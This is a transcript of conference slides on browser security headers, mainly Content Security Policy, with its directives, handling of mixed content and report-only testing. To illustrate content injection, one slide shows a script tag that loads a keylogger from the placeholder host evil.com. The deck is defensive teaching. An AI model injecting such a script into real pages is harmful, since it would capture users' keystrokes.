d3ldn17 - recruiting the browser
TRANSCRIPT
![Page 1: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/1.jpg)
Recruiting The Browser
@Scott_Helme |
scotthelme.co.uk
Scott Helme
![Page 2: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/2.jpg)
![Page 3: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/3.jpg)
![Page 4: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/4.jpg)
![Page 5: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/5.jpg)
![Page 6: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/6.jpg)
![Page 7: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/7.jpg)
![Page 8: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/8.jpg)
![Page 9: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/9.jpg)
![Page 10: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/10.jpg)
How security has evolved
![Page 11: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/11.jpg)
Browser support
![Page 12: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/12.jpg)
Content Security Policy
![Page 13: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/13.jpg)
Content Injection
<html>
<body>
<comment>
<script src=“evil.com/keylogger.js”></script>
</comment>
…
![Page 14: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/14.jpg)
What is CSP?
cache-control: max-age=0, no-cache
content-encoding: gzip
content-security-policy: [policy goes here]
date: Tue, 17 Oct 2017 11:30:00
server: Incapsula
status: 200
![Page 15: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/15.jpg)
child-src
connect-src
default-src
font-src
frame-src
CSP Directives
img-src
media-src
object-src
script-src
style-src
![Page 16: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/16.jpg)
A basic policy
Content-Security-Policy: default-src ‘self’ example.com
![Page 17: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/17.jpg)
Fine tuning
Content-Security-Policy: default-src ‘self’;
script-src ‘self’ cdnjs.cloudflare.com ajax.googleapis.com
<script src="https://ajax.googleapis.com/.../jquery.min.js">
</script>
<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js">
</script>
![Page 18: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/18.jpg)
Fine tuning
Content-Security-Policy: default-src ‘self’;
script-src [source list];
style-src [source list];
img-src [source list];
frame-src [source list];
![Page 19: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/19.jpg)
Mixed-Content
![Page 20: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/20.jpg)
Mixed-Content
![Page 21: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/21.jpg)
Mixed-Content
![Page 22: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/22.jpg)
Mixed-Content
block-all-mixed-content
<img src=“http://imgur.com/Incapsula-D3.png”>
![Page 23: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/23.jpg)
Mixed-Content
upgrade-insecure-
requests
<img src=“http://imgur.com/Incapsula-D3.png”>
![Page 24: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/24.jpg)
Testing CSP
Content-Security-Policy-Report-Only: [policy]
Console:
Refused to load the script
‘https://code.jquery.com/jquery.1.11.3min.js’ because it violates the
following Content Security Policy directive: script-src
![Page 25: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/25.jpg)
Testing CSP
Content-Security-Policy-Report-Only: [policy]
report-uri https://report-uri.io
{
"csp-report": {
"document-uri": "http://scotthelme.co.uk/blah/",
"violated-directive": "default-src https:",
”effective-directive": ”img-src",
"blocked-uri": "http://imgur.com" ...
![Page 26: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/26.jpg)
![Page 27: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/27.jpg)
![Page 28: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/28.jpg)
Content-Security-PolicyContent-Security-Policy-Report-OnlyX-Webkit-Content-Security-PolicyX-Content-Security-Policy
Public-Key-PinsPublic-Key-Pins-Report-Only
Other Security Headers
Expect-Staple
Expect-CT
X-Xss-Protection
![Page 29: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/29.jpg)
![Page 30: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/30.jpg)
![Page 31: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/31.jpg)
Secure all the things!
@Scott_Helme | scotthelme.co.uk
Scott Helme